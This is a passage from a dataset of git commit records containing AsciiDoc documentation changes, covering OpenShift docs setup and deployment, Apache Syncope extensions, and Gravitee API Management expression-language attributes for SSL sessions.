`.gitignore` file is set up to prevent anything under the `_preview` and\n`_package` directories from being committed. 
However, you can reset the\nenvironment manually by running:\n\n----\n$ asciibinder clean\n----\n\n== Next steps\nWith the repository and tools set up on your workstation, you can now either\nedit existing content or create assemblies and modules.\n\n* link:doc_guidelines.adoc[Review the documentation guidelines] to understand\nsome basic guidelines to keep things consistent across our content.\n* link:create_or_edit_content.adoc[Create a local working branch] on your\nworkstation to edit existing content or create content.\n\n=== How to deploy to your own OpenShift cluster for testing\n\nYou can deploy to your own OpenShift cluster for development. This process will use your github repo to launch the website,\nand therefore your github repo must have all of the upstream branches. `main` is used for site changes,\nso assuming all your work is in `main`, you can remove all remote branches and then push the upstream branches.\n\n\nRemoving remote branches and updating with upstream branches (this assumes remote repos called `origin` and `upstream`)\n[WARNING]\n====\nThis is a destructive process, make sure that this is purely a development repo, as all local and remote branches will be deleted\nby performing the below commands.\n====\n----\n$ git fetch --all\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ origin\"); do git push origin --delete $(echo $branch | cut -d '\/' -f 2); done\n$ git branch -D $(git branch | grep -v 'main' | xargs)\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ upstream\"); do git branch --track $(echo $branch | cut -d '\/' -f 2) $(echo $branch | tr -d '[:space:]'); done\n$ for branch in $(git branch | grep -v \"main\"); do git push origin $(echo $branch | tr -d '[:space:]'); done\n----\n\nDeploying the docs site to an OpenShift cluster\n----\n$ oc process -f asciibinder-template.yml -p NAME=community-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=community \\\n | oc create -f -\n$ oc process -f asciibinder-template.yml -p NAME=commercial-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=commercial \\\n | oc create -f -\n----\n\n[NOTE]\n====\nIf the build fails with \"Fetch source failed\" status, you can\ndelete all the created objects and re-run above with an HTTP uri\nas the `SOURCE_REPOSITORY_URL`, or you can\nlink:https:\/\/docs.okd.io\/latest\/dev_guide\/builds\/build_inputs.html#source-secrets-combinations[create a source secret]\nand add it to the stg1 build, `oc set build-secret --source bc\/stg1-docs <secret name>`.\n====\n\n\nYou can delete all created objects by running\n\n----\n$ oc delete all -l app=community-docs\n$ oc delete all -l app=commercial-docs\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2c06a985efae35bba59f16a77d97696eb7eb39d","subject":"[SYNCOPE-152] Little doc addition","message":"[SYNCOPE-152] Little doc addition\n","repos":"apache\/syncope,ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope,apache\/syncope,ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/concepts\/extensions.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/concepts\/extensions.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. 
See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Extensions\n\nThe _vanilla_ Apache Syncope deployment can be optionally enriched with useful features via an Extension, instead of bloating\nevery single deployment with unneeded libraries and configurations.\n\nWith reference to <<architecture,architecture>>, an extension might add a <<rest>> endpoint, manage the\n<<persistence,persistence>> of additional entities, extend the <<security,security>> mechanisms, tweak the\n<<provisioning-layer,provisioning layer>>, add features to the <<admin-console-component>> or\nthe <<enduser-component>>, or even bring all such things together.\n\nExtensions are available from different sources:\n\n. as Maven artifacts published from the Apache Syncope codebase, part of the official releases - this is the case of the\nones detailed below;\n. as Maven artifacts published by third parties;\n. as part of a given deployment source code, as explained <<customization-extensions, in the following>>.\n\n==== Apache Camel Provisioning Manager\n\nThis extension delegates the <<provisioning,provisioning>> process execution to a set of\nhttp:\/\/camel.apache.org[Apache Camel^] routes.\n\nThe pre-loaded routes can be dynamically changed at runtime via REST or admin console, and modifications are immediately\nmade available for processing.\n\nFor example, on creating a new user, you may wish to send an email to an administrator; or if a user is\nreactivated, you may wish to reactivate the user's home page on a web server. +\nAll these things and more are possible using the myriad of\nhttp:\/\/camel.apache.org\/components.html[components^] that are available to be used in Apache Camel routes.\n\n
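As a purely illustrative sketch - the route id and endpoint URIs below are assumptions, not one of the extension's actual pre-loaded routes - a route reacting to user creation events and notifying an administrator by mail might look like:\n\n[source,xml]\n----\n<route id=\"notifyAdminOnUserCreate\">\n  <!-- entry point of the route; the URI is illustrative -->\n  <from uri=\"direct:createUser\"\/>\n  <!-- forward the exchange to the Camel mail component -->\n  <to uri=\"smtp:\/\/mail.example.com?to=admin@example.com\"\/>\n<\/route>\n----\n\n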
[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/camel[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/camel[source tree^]\nendif::[]\n.\n====\n\n==== Swagger\n\nThis extension enables http:\/\/swagger.io\/swagger-ui\/[Swagger UI^] as a web interface for dealing with Apache Syncope\n<<rest,RESTful>> services.\n\nOnce installed, Swagger UI is available at\n\n....\nprotocol:\/\/host:port\/syncope\/swagger\/\n....\n\nwhere `protocol`, `host` and `port` reflect your Java EE container installation.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/swagger-ui[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/swagger-ui[source tree^]\nendif::[]\n.\n====\n\n==== SAML 2.0 Service Provider\n\nThis extension can be leveraged to provide\nhttps:\/\/en.wikipedia.org\/wiki\/Security_Assertion_Markup_Language[SAML 2.0^]-based\nhttps:\/\/en.wikipedia.org\/wiki\/Single_sign-on[Single Sign-On^] access to the <<admin-console-component>>,\nthe <<enduser-component>> or any other Java EE application dealing with the <<core>>.\n\nOnce installed, one or more https:\/\/en.wikipedia.org\/wiki\/Identity_provider[Identity Providers^] can be imported from\ntheir https:\/\/en.wikipedia.org\/wiki\/SAML_2.0#SAML_2.0_Metadata[metadata^].\nFor each Identity Provider, it is possible to configure which one of the attributes - returned as part of the assertion\ncontaining the attribute statements - is going to be used by Syncope to match the internal users.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/saml2sp[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/saml2sp[source tree^]\nendif::[]\n.\n====\n\n[TIP]\n====\nThis extension adds features to all components and layers that are available, and can be taken as reference when creating\n<<customization-extensions,new extensions>>.\n====\n\n==== Elasticsearch\n\nThis extension provides an alternate internal search engine for <<users-groups-and-any-objects>>, requiring an external \nhttps:\/\/www.elastic.co\/[Elasticsearch^] cluster.\n\n[TIP]\nAs search operations are central for different aspects of the <<provisioning,provisioning process>>, the overall\nperformance is expected to improve when using this extension.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/elasticsearch[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/elasticsearch[source tree^]\nendif::[]\n.\n====\n\n==== SCIM\n\nhttp:\/\/www.simplecloud.info\/[SCIM^] (System for Cross-domain Identity Management) 2.0 is the open API for managing\nidentities, published under the IETF:\n\n. https:\/\/tools.ietf.org\/html\/rfc7642[Definitions, Overview, Concepts, and Requirements^]\n. https:\/\/tools.ietf.org\/html\/rfc7643[Core Schema^]\n. https:\/\/tools.ietf.org\/html\/rfc7644[Protocol^]\n\nThis extension enables an additional `\/scim` REST endpoint, implementing the communication according to the SCIM 2.0\nstandard, in order to provision User, Enterprise User and Group SCIM entities to Apache Syncope.\n\n
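For instance, once deployed, the standard SCIM 2.0 resource endpoints can be queried over plain HTTP. A minimal sketch - the base URL mirrors the placeholders used above, while the credentials and the exact path under `\/scim` are assumptions that depend on your installation:\n\n....\ncurl -u admin:password -H \"Accept: application\/scim+json\" protocol:\/\/host:port\/syncope\/rest\/scim\/v2\/Users\n....\n\n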
[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/scimv2[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/scimv2[source tree^]\nendif::[]\n.\n====\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. 
+\nAll these things and more are possible using the myriad of\nhttp:\/\/camel.apache.org\/components.html[components^] that are available to be used in Apache Camel routes.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/camel[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/camel[source tree^]\nendif::[]\n.\n====\n\n==== Swagger\n\nThis extension enables http:\/\/swagger.io\/swagger-ui\/[Swagger UI^] as web interface for dealing with Apache Syncope\n<<rest,RESTful>> services.\n\nOnce installed, Swagger UI is available at\n\n....\nprotocol:\/\/host:port\/syncope\/swagger\/\n....\n\nwhere `protocol`, `host` and `port` reflect your Java EE container installation.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/swagger-ui[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/swagger-ui[source tree^]\nendif::[]\n.\n====\n\n==== SAML 2.0 Service Provider\n\nThis extension can be leveraged to provide\nhttps:\/\/en.wikipedia.org\/wiki\/Security_Assertion_Markup_Language[SAML 2.0^]-based\nhttps:\/\/en.wikipedia.org\/wiki\/Single_sign-on[Single Sign-On^] access to the <<admin-console-component>>,\nthe <<enduser-component>> or any other Java EE application dealing with the <<core>>.\n\nOnce installed, one or more https:\/\/en.wikipedia.org\/wiki\/Identity_provider[Identity Providers^] can be imported from\ntheir https:\/\/en.wikipedia.org\/wiki\/SAML_2.0#SAML_2.0_Metadata[metadata^].\nFor each Identity Provider, it is to configure which one of the attributes - returned as part of the assertion\ncontaining the attribute statements - is going to be used by Syncope to match the internal users.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/saml2sp[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/saml2sp[source tree^]\nendif::[]\n.\n====\n\n[TIP]\n====\nThis extension adds features to all components and layers that are available, and can be taken as reference when creating\n<<customization-extensions,new extensions>>.\n====\n\n==== Elasticsearch\n\nThis extension provides an alternate internal search engine for <<users-groups-and-any-objects>>, requiring an external \nhttps:\/\/www.elastic.co\/[Elasticsearch^] cluster.\n\n[TIP]\nAs search operations are central for different aspects of the <<provisioning,provisioning process>>, the global\nperformances are expected to improve when using this extension.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/elasticsearch[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/elasticsearch[source 
tree^]\nendif::[]\n.\n====\n\n==== SCIM\n\nhttp:\/\/www.simplecloud.info\/[SCIM^] (System for Cross-domain Identity Management) 2.0 is the open API for managing\nidentities, published under the IETF:\n\n. https:\/\/tools.ietf.org\/html\/rfc7642[Definitions, Overview, Concepts, and Requirements^]\n. https:\/\/tools.ietf.org\/html\/rfc7643[Core Schema^]\n. https:\/\/tools.ietf.org\/html\/rfc7644[Protocol^]\n\nThis extension enables an additional `\/scim` REST endpoint, implementing the communication according to the SCIM 2.0\nstandard.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/scimv2[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/scimv2[source tree^]\nendif::[]\n.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8525fc3173c23b41c3fcd82816965ac13114c33d","subject":"feat: allow access to SSL attributes in EL TemplateEngine","message":"feat: allow access to SSL attributes in EL TemplateEngine\n\ngravitee-io\/#issues#5322\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/user-guide\/publisher\/expression-language.adoc","new_file":"pages\/apim\/3.x\/user-guide\/publisher\/expression-language.adoc","new_contents":"= Expression Language\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_publisherguide_expression_language.html\n:page-folder: apim\/user-guide\/publisher\n:page-layout: apim3x\n\n== Overview\n\nThe APIM Expression Language (EL for short) is one of the key features\nthat can be used by API publishers to configure various aspects and services of an API.\n\nThe EL is a powerful language used for querying and\nmanipulating an object graph. It is based on the http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/expressions.html[SpEL^] (Spring Expression Language).\nThis means that you can do everything described in the linked SpEL documentation.\n\nIn addition, APIM extends the standard SpEL capabilities by providing extra objects and properties\ninside the expression language context.\n\n== Usage\nThe basic expression language syntax is as follows:\n\n`{#request.id}`\n\nSee the sections below for example expression notations.\n\n== API\n=== Properties\n\nAs an API publisher, you can define properties for your API. These properties are\nautomatically _injected_ into the expression language context to be used later.\n\n==== Example\n\n* Get the value of the property `my-property` defined in API properties:\n`{#properties['my-property']}`\n\n=== Dictionaries\n\nDictionaries work in a similar way to properties, but you need to specify the dictionary name as well as the property name.\n\n==== Example\n\n* Get the value of the property `my-property` defined in dictionary `my-dictionary`:\n`{#dictionaries['my-dictionary']['my-property']}`\n\n=== Endpoints\nWhen you define endpoints for your API, you need to give them a _name_, which\nmust be a unique identifier across all endpoints of the API. This identifier can be used to get an endpoint reference (i.e. uri).\n\nFor example: when you create an API, a _default_ endpoint is created,\ncorresponding to the value you set for the backend property. 
This endpoint can\nbe retrieved with EL by using the following syntax:\n\n`{#endpoints['default']}`\n\n== Request\n\nThe properties you can access for API requests are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|id |Identifier ^.^|string |12345678-90ab-cdef-1234-567890ab\n.^|transactionId |Transaction identifier ^.^|string |cd123456-7890-abcd-ef12-34567890\n.^|uri |URI ^.^|string |\/v2\/store\/MyStore?order=100\n.^|path |Path ^.^|string |\/v2\/store\/MyStore\n.^|paths |Path parts ^.^|array of string |[,v2,store,MyStore]\n.^|pathInfo |Path info ^.^|string |\/store\/MyStore\n.^|pathInfos |Path info parts ^.^|array of string |[,store,MyStore]\n.^|contextPath |Context path ^.^|string |\/v2\/\n.^|params |Query parameters ^.^|key \/ value |order -> 100\n.^|pathParams |Path parameters ^.^|key \/ value |storeId -> MyStore (__see Warning for details__)\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|method |HTTP method ^.^|string |GET\n.^|scheme |HTTP scheme ^.^|string |http\n.^|version |HTTP version ^.^|string |HTTP_1_1\n.^|timestamp |Timestamp ^.^|long |1602781000267\n.^|remoteAddress |Remote address ^.^|string |0:0:0:0:0:0:0:1\n.^|localAddress |Local address ^.^|string |0:0:0:0:0:0:0:1\n.^|content |Body content ^.^|string |-\n.^|ssl |SSLSession information ^.^|<<SSL Object>> |-\n|===\n\nWARNING: `{#request.content}` is only available for policies bound to an `on-request-content` phase.\n\n=== SSL Object\nThe properties you can access in the SSL session object are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|clientHost |Host name of the client ^.^|string |client.domain.com\n.^|clientPort |Port number of the client ^.^|long |443\n.^|client |Client information ^.^|<<Principal Object>> |-\n.^|server |Server information ^.^|<<Principal Object>> |-\n|===\n\n=== Principal Object\nThe properties you can access in the Principal object are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n4+|*Common DN attributes*\n.^|businessCategory |Business category ^.^|string |-\n.^|c |Country code ^.^|string |FR\n.^|cn |Common name ^.^|string |-\n.^|countryOfCitizenship |RFC 3039 CountryOfCitizenship ^.^|string |-\n.^|countryOfResidence |RFC 3039 CountryOfResidence ^.^|string |-\n.^|dateOfBirth |RFC 3039 DateOfBirth ^.^|string |19830719000000Z\n.^|dc |Domain component ^.^|string |-\n.^|description |Description ^.^|string |-\n.^|dmdName |RFC 2256 directory management domain ^.^|string |-\n.^|dnQualifier |Domain name qualifier ^.^|string |-\n.^|e |Email address in Verisign certificates ^.^|string |-\n.^|emailAddress |Email address (RSA PKCS#9 extension) ^.^|string |-\n.^|gender |RFC 3039 Gender ^.^|string |\"M\", \"F\", \"m\" or \"f\"\n.^|generation |Naming attributes of type X520name ^.^|string |-\n.^|givenname |Naming attributes of type X520name ^.^|string |-\n.^|initials |Naming attributes of type X520name ^.^|string |-\n.^|l |Locality name ^.^|string |-\n.^|name |Name ^.^|string |-\n.^|nameAtBirth |ISIS-MTT NameAtBirth ^.^|string |-\n.^|o |Organization ^.^|string |-\n.^|organizationIdentifier |Organization identifier ^.^|string |-\n.^|ou |Organization unit name ^.^|string |-\n.^|placeOfBirth |RFC 3039 PlaceOfBirth ^.^|string |-\n.^|postalAddress |RFC 3039 PostalAddress ^.^|string |-\n.^|postalCode |Postal code ^.^|string |-\n.^|pseudonym |RFC 3039 Pseudonym ^.^|string |-\n.^|role |Role ^.^|string |-\n.^|serialnumber |Device serial number name ^.^|string |-\n.^|st |State or province name ^.^|string |-\n.^|street |Street 
^.^|string |-\n.^|surname |Naming attributes of type X520name ^.^|string |-\n.^|t |Title ^.^|string |-\n.^|telephoneNumber |Telephone number ^.^|string |-\n.^|uid |LDAP User id ^.^|string |-\n.^|uniqueIdentifier |Naming attributes of type X520name ^.^|string |-\n.^|unstructuredAddress |Unstructured address (from PKCS#9) ^.^|string |-\n4+|*Other attributes*\n.^|attributes |Retrieves all attribute values ^.^|key \/ value |\"ou\" -> [\"Test team\", \"Dev team\"]\n.^|defined |Returns true if the principal object is defined and contains values. False otherwise. ^.^|boolean |-\n.^|dn |Full domain name ^.^|string |-\n\n|===\n\nEven though some of these attributes can be arrays, EL returns the first item in the array.\nTo retrieve all the values of an attribute, use the `attributes` field.\n\nIf the principal is not defined, all values are empty.\n\n=== Examples\n\n* Get the value of the `Content-Type` header for an incoming HTTP request:\n`{#request.headers['content-type']}`\n\n* Get the second part of the request path:\n`{#request.paths[1]}`\n\n* Get the client HOST from the SSL session:\n`{#request.ssl.clientHost}`\n\n* Get the client DN from the SSL session:\n`{#request.ssl.client.dn}`\n\n* Get the server organization from the SSL session:\n`{#request.ssl.server.o}`\n\n* Get all the organization units of the server from the SSL session:\n- `{#request.ssl.server.attributes['ou'][0]}`\n- `{#request.ssl.server.attributes['OU'][1]}`\n- `{#request.ssl.server.attributes['Ou'][2]}`\n\n* Get a custom attribute of the client from the SSL session:\n`{#request.ssl.client.attributes['1.2.3.4'][0]}`\n\n* Determine if the SSL attributes of the client are set:\n`{#request.ssl.client.defined}`\n\n== Request context\n\n=== Properties\n\n|===\n|Property |Description |Type |Always present\n\n.^|attributes\n|Request context attributes\n^.^|key-value\n^.^|X\n|===\n\n=== Attributes\nWhen APIM Gateway handles an incoming HTTP request, some attributes are\nautomatically created. These attributes are:\n\n|===\n|Property |Description |Type |Nullable\n\n.^|context-path\n|Context-path\n^.^|string\n^.^|-\n\n.^|resolved-path\n|Resolved-path is the path defined in policies\n^.^|string\n^.^|-\n\n.^|application\n|The authenticated application making the incoming HTTP request\n^.^|string\n^.^|X (for keyless plan)\n\n.^|api\n|Called API\n^.^|string\n^.^|-\n\n.^|user-id\n|The user identifier of the incoming HTTP request:\n\n* The subscription id for an api-key based plan\n\n* Remote IP for a keyless based plan\n\n^.^|string\n^.^|-\n\n.^|plan\n|Plan used to manage the incoming HTTP request\n^.^|string\n^.^|-\n\n.^|api-key\n|The api-key used (in the case of an api-key based plan)\n^.^|string\n^.^|X (for no api-key plan)\n|===\n\nAdditionally, some policies (like the link:\/apim\/3.x\/apim_policies_oauth2.html#attributes[OAuth2 policy])\nregister other attributes in the context. See the documentation for the policies you are using for more information.\n\n=== Example\n\n* Get the value of the `user-id` attribute for an incoming HTTP request:\n\n`{#context.attributes['user-id']}`\n\n* Get the value of the `plan` attribute for an incoming HTTP request:\n\n`{#context.attributes['plan']}`\n\n* Check that the path starts with a given value:\n\n`{#request.path.startsWith('\/my\/api')}`\n\n== Response\n\n=== Properties\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|content |Body content ^.^|string |-\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|status |Status of the HTTP response ^.^|int |200\n|===\n\n=== Example\n\n* Get the status of an HTTP response:\n`{#response.status}`\n\n== Policies\nYou can use the EL to update some aspects of policy configuration.\nEach policy specifies whether or not it supports EL.\n\n== Mixin\n\nIn previous examples, we showed various ways to manipulate objects available\nin the EL context. You can also mix property\nusage to provide an increasingly dynamic configuration.\n\nFor example, we can retrieve the value of an HTTP header where the name\nis based on an API property named `my-property`:\n\n`{#request.headers[#properties['my-property']]}`\n
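\nSince EL is SpEL-based, you can also combine several of these objects with boolean operators, which is handy for conditional policy configuration. A sketch - the header value and plan name below are purely illustrative:\n\n`{#request.headers['content-type'] == 'application\/json' and #context.attributes['plan'] == 'premium'}`\n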
","old_contents":"= Expression Language\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_publisherguide_expression_language.html\n:page-folder: apim\/user-guide\/publisher\n:page-layout: apim3x\n\n== Overview\n\nThe APIM Expression Language (EL for short) is one of the key features\nthat can be used by API publishers to configure various aspects and services of an API.\n\nThe EL is a powerful language used for querying and\nmanipulating an object graph. It is based on the http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/expressions.html[SpEL^] (Spring Expression Language).\nThis means that you can do everything described in the link.\n\nIn addition, APIM extends the standard SpEL capabilities by providing extra objects and properties\ninside the expression language context.\n\n== Usage\nThe basic expression language syntax is as follows:\n\n`{#request.id}`\n\nSee the sections below for example expression notations.\n\n== API\n=== Properties\n\nAs an API publisher, you can define properties for your API. These properties are\nautomatically _injected_ into the expression language context to be used later.\n\n==== Example\n\n* Get the value of the property `my-property` defined in API properties:\n`{#properties['my-property']}`\n\n=== Dictionaries\n\nDictionaries work in a similar way to properties, but you need to specify the dictionary name as well as the property name.\n\n==== Example\n\n* Get the value of the property `my-property` defined in dictionary `my-dictionary`:\n`{#dictionaries['my-dictionary']['my-property']}`\n\n=== Endpoints\nWhen you define endpoints for your API, you need to give them a _name_ which\nmust be a unique identifier across all endpoints of the API. This identifier can be used to get an endpoint reference (i.e. uri).\n\nFor example: when you create an API, a _default_ endpoint is created,\ncorresponding to the value you set for the backend property. 
This endpoint can\nbe retrieved with EL by using the following syntax:\n\n`{#endpoints['default']}`\n\n== Request\n\nThe properties you can access for API requests are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|id |Identifier ^.^|string |12345678-90ab-cdef-1234-567890ab\n.^|transactionId |Transaction identifier ^.^|string |cd123456-7890-abcd-ef12-34567890\n.^|uri |URI ^.^|string |\/v2\/store\/MyStore?order=100\n.^|path |Path ^.^|string |\/v2\/store\/MyStore\n.^|paths |Path parts ^.^|array of string |[,v2,store,MyStore]\n.^|pathInfo |Path info ^.^|string |\/store\/MyStore\n.^|pathInfos |Path info parts ^.^|array of string |[,store,MyStore]\n.^|contextPath |Context path ^.^|string |\/v2\/\n.^|params |Query parameters ^.^|key \/ value |order -> 100\n.^|pathParams |Path parameters ^.^|key \/ value |storeId -> MyStore (__see Warning for details__)\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|method |HTTP method ^.^|string |GET\n.^|scheme |HTTP scheme ^.^|string |http\n.^|version |HTTP version ^.^|string |HTTP_1_1\n.^|timestamp |Timestamp ^.^|long |1602781000267\n.^|remoteAddress |Remote address ^.^|string |0:0:0:0:0:0:0:1\n.^|localAddress |Local address ^.^|string |0:0:0:0:0:0:0:1\n.^|content |Body content ^.^|string |-\n|===\n\nWARNING: `{#request.content}` is only available for policies bound to an `on-request-content` phase.\n\n=== Example\n\n* Get the value of the `Content-Type` header for an incoming HTTP request:\n`{#request.headers['content-type']}`\n\n* Get the second part of the request path:\n`{#request.paths[1]}`\n\n== Request context\n\n=== Properties\n\n|===\n|Property |Description |Type |Always present\n\n.^|attributes\n|Request context attributes\n^.^|key-value\n^.^|X\n|===\n\n=== Attributes\nWhen APIM Gateway handles an incoming HTTP request, some attributes are\nautomatically created. These attributes are:\n\n|===\n|Property |Description |Type |Nullable\n\n.^|context-path\n|Context-path\n^.^|string\n^.^|-\n\n.^|resolved-path\n|Resolved-path is the path defined in policies\n^.^|string\n^.^|-\n\n.^|application\n|The authenticated application doing incoming HTTP request\n^.^|string\n^.^|X (for keyless plan)\n\n.^|api\n|Called API\n^.^|string\n^.^|-\n\n.^|user-id\n|The user identifier of incoming HTTP request:\n\n* The subscription id for api-key based plan\n\n* Remote IP for keyless based plan\n\n^.^|string\n^.^|-\n\n.^|plan\n|Plan used to manage incoming HTTP request\n^.^|string\n^.^|-\n\n.^|api-key\n|the api-key used (in case of an api-key based plan)\n^.^|string\n^.^|X (for no api-key plan)\n|===\n\nAdditionally, some policies (like the link:\/apim\/3.x\/apim_policies_oauth2.html#attributes[OAuth2 policy])\nregister other attributes in the context. 
See the documentation for the policies you are using for more information.\n\n=== Example\n\n* Get the value of the `user-id` attribute for an incoming HTTP request:\n\n`{#context.attributes['user-id']}`\n\n* Get the value of the `plan` attribute for an incoming HTTP request:\n\n`{#context.attributes['plan']}`\n\n* Check that the path starts with a given value:\n\n`{#request.path.startsWith('\/my\/api')}`\n\n== Response\n\n=== Properties\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|content |Body content ^.^|string |-\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|status |Status of the HTTP response ^.^|int |200\n|===\n\n=== Example\n\n* Get the status of an HTTP response:\n`{#response.status}`\n\n== Policies\nYou can use the EL to update some aspects of policy configuration.\nThe policy specifies if it supports EL or not.\n\n== Mixin\n\nIn previous examples, we showed various ways to manipulate objects available\nin the EL context. You can also mix property\nusage to provide an increasingly dynamic configuration.\n\nFor example, we can retrieve the value of an HTTP header where the name\nis based on an API property named `my-property`:\n\n`{#request.headers[#properties['my-property']]}`\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef24ddd76459cfb96626b3d1bb18bd956897f8fa","subject":"GitHub-26681: Noted new flag for JDK 11+","message":"GitHub-26681: Noted new flag for JDK 11+\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nodes-cluster-resource-configure-jdk.adoc","new_file":"modules\/nodes-cluster-resource-configure-jdk.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6166025bb088d0fea0348759d9f0bd917e935be4","subject":"Correcting gramma","message":"Correcting 